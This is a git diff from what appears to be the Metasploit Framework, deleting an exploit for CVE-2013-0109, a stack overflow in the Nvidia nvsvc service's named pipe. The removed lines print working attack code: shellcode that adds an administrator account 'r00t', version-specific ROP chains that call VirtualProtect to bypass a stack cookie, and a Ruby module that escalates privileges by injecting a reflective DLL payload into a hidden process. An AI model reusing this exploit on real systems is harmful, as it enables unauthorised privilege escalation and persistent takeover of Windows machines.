-                "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 
-                "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 
-                "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 
-                "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 
-                "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 
-                "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 
-                "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 
-                "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 
-                "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 
-                "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 
-                "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 
-                "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 
-                "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 
-                "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" 
-                "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 
-                "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" 
-                "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" 
-                "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" 
-                "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" 
-                "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" 
-                "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
-            printf("Building exploit ...\n");
-            unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
-            printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
-
-            memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
-
-            unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
-
-            // Perform some limited fingerprinting (my default install version, vs latest at time of testing)
-            switch(uiRetnAddress & 0xfff)
-            {
-            case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
-                {
-                    uiBase = uiRetnAddress - 0x4640;
-                    printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
-
-                    pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));
-
-                    // Param 1: lpAddress [r11 (near rsp) into rcx]
-                    pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
-                    pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
-                    pRopChain[2] = 0; // Padding
-                    pRopChain[3] = 0; // ...
-                    pRopChain[4] = 0; // ...
-                    pRopChain[5] = 0; // ...
-                    pRopChain[6] = 0; // ...
-                    pRopChain[7] = uiBase + 0x7773;  // nvvsvc.exe+0x7773: pop rax; retn
-                    pRopChain[8] = 0x1;   // Param 2: dwSize [rdx = 1 (whole page)]
-                    pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
-                    pRopChain[10] = 0; // Padding
-                    pRopChain[11] = 0; // ...
-                    pRopChain[12] = 0; // ...
-                    pRopChain[13] = 0; // ...
-                    pRopChain[14] = 0; // ...
-                    pRopChain[15] = uiBase + 0x7772;  // nvvsvc.exe+0x7772: pop r8; retn
-                    pRopChain[16] = 0x40;  // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
-                    pRopChain[17] = uiBase + 0x7773;  // nvvsvc.exe+0x7773: pop rax; retn
-                    // Param 4: lpflOldProtect [r9 - already points at writable location]
-                    pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
-                    pRopChain[19] = uiBase + 0x5d60;  // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
-                    pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
-                    pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
-
-                    memcpy(pRopChain + 22, code, sizeof(code));
-                }
-                break;
-            case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
-                {
-                    uiBase = uiRetnAddress - 0x39f1;
-                    printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
-
-                    pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));
-
-                    // Param 1: lpAddress [r11 (near rsp) into rcx]
-                    pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
-                    pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
-                    pRopChain[2] = 0; // Padding ...
-                    pRopChain[3] = 0; // ...
-                    pRopChain[4] = 0; // ...
-                    pRopChain[5] = 0; // ...
-                    pRopChain[6] = 0; // ...
-                    pRopChain[7] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
-                    pRopChain[8] = 0x1;              // Param 2: dwSize [rdx = 1 (whole page)]
-                    pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
-                    pRopChain[10] = 0; // Padding ...
-                    pRopChain[11] = 0; // ...
-                    pRopChain[12] = 0; // ...
-                    pRopChain[13] = 0; // ...
-                    pRopChain[14] = 0; // ...
-                    // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
-                    pRopChain[15] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
-                    pRopChain[16] = 0x40;             // PAGE_EXECUTE_READWRITE
-                    pRopChain[17] = uiBase + 0x8b92;  // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
-                    pRopChain[18] = 0; // Padding ...
-                    pRopChain[19] = 0; // ...
-                    pRopChain[20] = 0; // ...
-                    pRopChain[21] = 0; // ...
-                    pRopChain[22] = 0; // ...
-                    // Param 4: lpflOldProtect [r9 - already points at writable location]
-                    pRopChain[23] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
-                    pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
-                    pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
-                    pRopChain[26] = 0; // Padding ...
-                    pRopChain[27] = 0; // ...
-                    pRopChain[28] = 0; // ...
-                    pRopChain[29] = 0; // ...
-                    pRopChain[30] = 0; // ...
-                    pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
-                    pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
-
-                    memcpy(pRopChain + 33, code, sizeof(code));
-                }
-                break;
-            case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
-                {
-                    uiBase = uiRetnAddress - 0x3a11;
-                    printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
-
-                    pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));
-
-                    // Param 1: lpAddress [r11 (near rsp) into rcx]
-                    pRopChain[0] = uiBase + 0x15b52;    // nvvsvc.exe+0x15b52: mov rax, r11; retn
-                    pRopChain[1] = uiBase + 0x54d4c;    // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
-                    pRopChain[2] = 0;  // Padding ...
-                    pRopChain[3] = 0;  // ...
-                    pRopChain[4] = 0;  // ...
-                    pRopChain[5] = 0;  // ...
-                    pRopChain[6] = 0;  // ...
-                    pRopChain[7] = uiBase + 0x8d7aa;    // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
-                    pRopChain[8] = 0x1;                 // Param 2: dwSize [rdx = 1 (whole page)]
-                    pRopChain[9] = 0;                   // Padding ...
-                    // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
-                    pRopChain[10] = uiBase + 0xd33a;    // nvvsvc.exe+0xd33a: pop rax; retn
-                    pRopChain[11] = 0x40;               // PAGE_EXECUTE_READWRITE
-                    pRopChain[12] = uiBase + 0x8d26;    // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
-                    pRopChain[13] = 0; // Padding ...
-                    pRopChain[14] = 0; // ...
-                    pRopChain[15] = 0; // ...
-                    pRopChain[16] = 0; // ...
-                    pRopChain[17] = 0; // ...
-                    // Param 4: lpflOldProtect [r9 - already points at writable location]
-                    pRopChain[18] = uiBase + 0xd33a;    // nvvsvc.exe+0xd33a: pop rax; retn
-                    pRopChain[19] = uiBase + 0x91310;   // IAT entry &VirtualProtect - 0x128
-                    pRopChain[20] = uiBase + 0x82851;   // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
-                    pRopChain[21] = 0; // Padding ...
-                    pRopChain[22] = 0; // ...
-                    pRopChain[23] = 0; // ...
-                    pRopChain[24] = 0; // ...
-                    pRopChain[25] = 0; // ...
-                    pRopChain[26] = uiBase + 0x44fb6;   // nvvsvc.exe+0x44fb6: jmp rax
-                    pRopChain[27] = uiBase + 0x8a0dc;   // nvvsvc.exe+0x8a0dc: push rsp; retn
-
-                    memcpy(pRopChain + 28, code, sizeof(code));
-                }
-                break;
-            }
-
-            break;
-        }
-
-        i++;
-    }
-
-    dwReturnCode = 0;
-Cleanup:
-    if(hPipe)
-        CloseHandle(hPipe);
-
-    return dwReturnCode;
-}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/rdi.sln b/external/source/exploits/cve-2013-0109/rdi.sln
deleted file mode 100644
index b490cb423d..0000000000
--- a/external/source/exploits/cve-2013-0109/rdi.sln
+++ /dev/null
@@ -1,32 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 11.00
-# Visual C++ Express 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|ARM = Debug|ARM
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-		Release|ARM = Release|ARM
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb
deleted file mode 100644
index f47e3657c4..0000000000
--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ /dev/null
@@ -1,188 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-require 'rex'
-require 'msf/core/post/common'
-require 'msf/core/post/windows/priv'
-require 'msf/core/post/windows/process'
-require 'msf/core/post/windows/services'
-
-class Metasploit3 < Msf::Exploit::Local
-	Rank = AverageRanking
-
-	include Msf::Post::File
-	include Msf::Post::Windows::Priv
-	include Msf::Post::Windows::Process
-	include Msf::Post::Windows::Services
-
-	def initialize(info={})
-		super(update_info(info, {
-			'Name'		 => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
-			'Description'	 => %q{
-				The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
-				interact with the service. It contains a stacked based buffer overflow as a result
-				of a memmove operation.
-
-				N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
-
-				This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
-				It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
-			},
-			'License'	 => MSF_LICENSE,
-			'Author'	 =>
-				[
-					'Peter Wintersmith', # Original exploit
-					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',   # Metasploit integration
-				],
-			'Arch'		 => ARCH_X86_64,
-			'Platform'	 => 'win',
-			'SessionTypes'	 => [ 'meterpreter' ],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'thread',
-				},
-			'Targets'	 =>
-				[
-					[ 'Automatic', { } ]
-				],
-			'Payload'	 =>
-				{
-					'Space'       => 2048,
-					'DisableNops' => true
-				},
-			'References'	 =>
-				[
-					[ 'CVE', '2013-0109' ],
-					[ 'OSVDB', '88745' ],
-					[ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
-				],
-			'DisclosureDate' => 'Dec 25 2012',
-			'DefaultTarget'  => 0
-		}))
-
-	end
-
-	def check
-		vuln_hashes = [ '43f91595049de14c4b61d1e76436164f',
-				'3947ad5d03e6abcce037801162fdb90d',
-				'3341d2c91989bc87c3c0baa97c27253b' ]
-
-		os = sysinfo["OS"]
-		if os =~ /windows/i
-			svc = service_info 'nvsvc'
-			if svc and svc['Name'] =~ /NVIDIA/i
-				vprint_good("Found service '#{svc['Name']}'")
-
-				begin
-					unless is_running?
-						print_error("Service is not running!")
-					else
-						print_good("Service is running")
-					end
-				rescue RuntimeError => e
-					print_error("Unable to retrieve service status")
-				end
-
-				if sysinfo['Architecture'] =~ /WOW64/i
-					# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
-					return Exploit::CheckCode::Detected
-				else
-					path = svc['Command'].strip
-				end
-
-				begin
-					hash = client.fs.file.md5(path).unpack('H*').first
-				rescue Rex::Post::Meterpreter::RequestError => e
-					print_error("Error checking file hash: #{e}")
-					return Exploit::CheckCode::Detected
-				end
-
-				if vuln_hashes.include?(hash)
-					vprint_good("Hash '#{hash}' is listed as vulnerable")
-					return Exploit::CheckCode::Vulnerable
-				else
-					vprint_status("Hash '#{hash}' is not recorded as vulnerable")
-					return Exploit::CheckCode::Detected
-				end
-			else
-				return Exploit::CheckCode::Safe
-			end
-		end
-	end
-
-	def create_proc
-		windir = expand_path("%windir%")
-		cmd = "#{windir}\\SysWOW64\\notepad.exe"
-		return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
-	end
-
-	def is_running?
-		begin
-			status = service_status('nvsvc')
-			return (status and status[:state] == 4)
-		rescue RuntimeError => e
-			print_error("Unable to retrieve service status")
-			return false
-		end
-
-	end
-
-	def exploit
-		unless is_running?
-			print_error("Service not running - attempting to start")
-			res = service_start('nvsvc')
-			case res
-			when 0
-				print_good("Service started")
-			when 1
-				print_status("Service already started")
-			else
-				fail_with(Exploit::Failure::Unknown, "Unable to start service")
-			end
-		else
-			print_good("Service is running")
-		end
-
-		dll = ''
-		offset = nil
-		file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
-		File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
-
-		pay = payload.encoded
-
-		bo = dll.index('PAYLOAD:')
-		raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
-		dll[bo, pay.length] = [pay].pack("a*")
-
-		pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
-		pe.exports.entries.each do |entry|
-			if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-				offset = pe.rva_to_file_offset( entry.rva )
-				break
-			end
-		end
-
-		print_error("No offset found") unless offset
-
-		new_pid = create_proc
-
-		if not new_pid
-			fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
-		end
-
-		vprint_status("Injecting payload into memory")
-		host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
-		mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
-		host_process.memory.protect(mem)
-		host_process.memory.write(mem, dll)
-		print_status("Executing exploit...")
-		host_process.thread.create(mem+offset)
-	end
-end
-